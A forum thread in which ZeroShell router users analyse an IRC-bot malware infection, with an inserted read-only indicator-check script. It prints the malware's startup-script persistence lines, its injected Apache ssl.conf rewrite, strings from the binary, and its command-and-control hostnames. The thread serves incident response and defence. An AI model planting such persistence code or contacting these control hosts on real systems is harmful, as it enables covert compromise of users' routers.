DoS on DNS Zeroshell: Malware!


This topic contains 2 replies, has 0 voices, and was last updated by  fsala 4 years, 11 months ago.

Viewing 4 posts - 1 through 4 (of 4 total)
#43775

    fsala
    Member

    Hi all,
    I found malware on one of our ZS boards that creates a DoS on the Zeroshell DNS with 20k connections to it.

    Full analysis on the Italian board (sorry, Italian only, I’ll translate it in a while…): http://www.zeroshell.net/forum/viewtopic.php?t=4115

    #52997

    fsala
    Member

    In short:

    The issue is a running hidden executable (/DB/.DB.001) that opens thousands of connections to the DNS.
    Its file attributes are set to hide it and make deletion harder.


    root@zeroshell DB> ls -al
    total 131252
    drwxr-xr-x  4 root root      4096 Oct 21 17:09 .
    drwxr-xr-x 21 root root       520 Nov  6 12:55 ..
    -rwxr-xr-x  1 root root     23289 Nov 21  2012 .DB.001
    drwxr-xr-x  7 root root      4096 Jul  2  2012 _DB.001
    drwx------  2 root root     16384 Apr 20  2011 lost+found
    -rw-r--r--  1 root root 134217728 Apr 20  2011 swap-file

    root@zeroshell DB> lsattr .DB.001
    -u--ia .DB.001

    To deactivate/rename it:


    killall -9 .DB.001 ; chattr -iua .DB.001 ; mv .DB.001 DB-malware

    I analyzed the activity with “strace”: there are thousands of connections to the DNS with queries for “zeroshell.will.mx” and “zeroshell.samhan.biz”, and the binary contains code to open an IRC connection (like many worms).

    The executable starts at boot, inside the “Database Update” script (you find it in the Startup/Cron area), and is scheduled to restart every 2 minutes.


    # SSL Security Check
    Security=$(cat /etc/httpd/ssl.conf | grep C100-Security-Fix-beta12)
    if [ -z "$Security" ] && [ -f "/Database/var/register/system/ssl/ssl.conf" ]; then
        cp -rf /Database/var/register/system/ssl/ssl.conf /etc/httpd/ssl.conf
        httpd=$(pidof httpd);kill -HUP $httpd
    fi

    # Database Update
    Database=$(pidof .DB.001)
    if [ -z "$Database" ]; then
        /DB/.DB.001
    fi
    echo "OK"

    It also changes the SSL configuration of Apache:


    # C100-Security-Fix-beta12

    SSLOptions +StdEnvVars
    RewriteEngine On
    RewriteCond %{REQUEST_METHOD} GET
    RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]
    RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(//?)+ [OR]
    RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(..//?)+ [OR]
    RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC]
    RewriteRule .* - [F]

    The binary payload contains strings of this kind (IRC connection, browser emulation…), so I’m sure it’s malware:


    zeroshell.will.mx
    zeroshell.samhan.biz
    r/usr/dict/words%s : USERID : UNIX : %s
    http://GET /%s HTTP/1.0
    User-Agent: Mozilla/4.75 (X11; U; Linux 2.2.16-3 i686)
    NICK %s
    HELPIRC SH export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%sNOTICE %s :%s
    MODE %s -xi
    JOIN %s :%s
    WHO %s
    PONG %s
    352376433422PRIVMSGPINGNICKmkdir /tmp/lol/lib/kw+#z1zNICK %s
    USER %s localhost localhost

    At the moment I don’t know what the infection entry point was, but I suspect a bug in the OpenSSL library or in that area…

    Hope it helps!

    Fabrizio Sala/Netdream
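As an added example (not code from the thread, from fsala, or from the ZeroShell project), here is a read-only check for the indicators listed above: the hidden /DB/.DB.001 binary and its protective lsattr flags, the C100-Security-Fix-beta12 marker in /etc/httpd/ssl.conf, a startup script that launches /DB/.DB.001, and the two names seen in the strace output. The ROOT argument and the default startup-script directory are assumptions, so the check can be pointed at a mounted copy of a box instead of the live system; it only reports and does not kill, rename or chattr anything.

```shell
#!/bin/sh
# Added example: read-only indicator check for the .DB.001 infection described
# in the thread. Nothing here modifies the system; clean-up stays a manual step
# (killall / chattr -iua / mv as fsala posted).
#
# Usage: zs_check_indicators [ROOT] [SCRIPTDIR]
#   ROOT      assumption: "" for the live system, or the mount point of a copied
#             ZeroShell filesystem
#   SCRIPTDIR assumption: directory holding the Startup/Cron scripts
#             (defaults to ROOT/Database, which is a guess, not a ZeroShell fact)
# Prints one "HIT: ..." line per indicator and returns the number of hits (0 = clean).

zs_check_indicators() {
    root="${1:-}"
    scripts="${2:-$root/Database}"
    hits=0

    # Indicator 1: the hidden executable /DB/.DB.001.
    if [ -f "$root/DB/.DB.001" ]; then
        echo "HIT: hidden executable $root/DB/.DB.001 present"
        hits=$((hits + 1))
        # fsala's lsattr showed -u--ia (undeletable, immutable, append-only);
        # these are what make a plain rm fail until chattr -iua is run.
        if command -v lsattr >/dev/null 2>&1; then
            attrs=$(lsattr -d "$root/DB/.DB.001" 2>/dev/null | awk '{print $1}')
            case "$attrs" in
                *i*|*a*|*u*) echo "      protective attributes set: $attrs" ;;
            esac
        fi
    fi

    # Indicator 2: the marker the malware leaves in Apache's ssl.conf.
    if [ -f "$root/etc/httpd/ssl.conf" ] &&
       grep -q 'C100-Security-Fix-beta12' "$root/etc/httpd/ssl.conf"; then
        echo "HIT: C100-Security-Fix-beta12 marker in $root/etc/httpd/ssl.conf"
        hits=$((hits + 1))
    fi

    # Indicator 3: a startup/cron script that (re)launches /DB/.DB.001.
    if [ -d "$scripts" ]; then
        for f in $(grep -rl -- '/DB/.DB.001' "$scripts" 2>/dev/null); do
            echo "HIT: $f launches /DB/.DB.001"
            hits=$((hits + 1))
        done
    fi

    return "$hits"
}

# Indicator 4: the names the binary tries to resolve. Scans a saved strace,
# tcpdump or resolver log (plain text) and prints how many lines mention
# zeroshell.will.mx or zeroshell.samhan.biz; returns 0 if none, 1 otherwise.
zs_scan_dns_log() {
    n=$(grep -Eic 'zeroshell\.(will\.mx|samhan\.biz)' "$1" || true)
    echo "$n"
    [ "$n" -eq 0 ]
}
```

Run it on the live box as `zs_check_indicators` with no arguments, or against a mounted image as `zs_check_indicators /mnt/zs`; a non-zero return means at least one of the indicators from the thread is present. The DNS scan is a separate function because it works on captured text, so it is just as useful on a log pulled from a router that has already been cleaned.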

    #52998

    bbozo
    Member

    ZS 1 b16
    ZS 2 rc2
    almost all my routers (4 of 5) were infected

    Is there going to be some kind of patch?

    fsala thank you!!!!

    #52999

    drsox
    Member

    I’ve found one of my installations infected with this too.

    Can we try and narrow down what we have in common to work out the infection method?

    I am running Release 2.0.RC2, set up and running since circa 17/02/2013.

    I have (open to the world):
    -Port 80 (the web interface)
    -Port 443 (the web interface)
    -Some LAN-to-LAN (OpenVPN) connections.

    -rwxr-xr-x    1 root     root        23289 Nov 21  2012 .DB.001

    Yet other installations have not been infected.
    OK Installation 1 = Release 2.0.RC2 / Port 80 (Zeroshell server) only open to the world (Port 443 is blocked) running for about a year.

    OK Installation 2 = Release 2.0.RC2 / No ports open to the world running for about 2 months

    OK Installation 3 = Release 2.0.RC1 / Port 80, 443 and SSH open to the world running for about a year

    Both the hosts referenced in the copy I have are the same as the OP.
    zeroshell.will.mx
    and
    zeroshell.samhan.biz
    Luckily, neither of these resolves, and given the date on the infection I presume this must be a very, very old infection that we’ve only just discovered.

    root@zeroshell DB> pstree -Gp
    init(1)─┬─.DB.001(14049)
    root@zeroshell DB> ps aux | grep 14049
    root 7832 0.0 0.0 1944 244 pts/0 S 03:33 0:00 grep 14049
    root 14049 0.0 0.2 2036 640 ? S 2013 64:09 sleep 1800

    I slayed and reloaded the process; it spawned two of itself and instantly tried to resolve zeroshell.will.mx and zeroshell.samhan.biz.
    I forced my network to respond with an IP, and the infection then tried to contact zeroshell.will.mx on port 53 over TCP using the IRC protocol:

    NICK WORO
    USER DCRK localhost localhost :VQYJWO

    Tom – http://www.mouselike.org
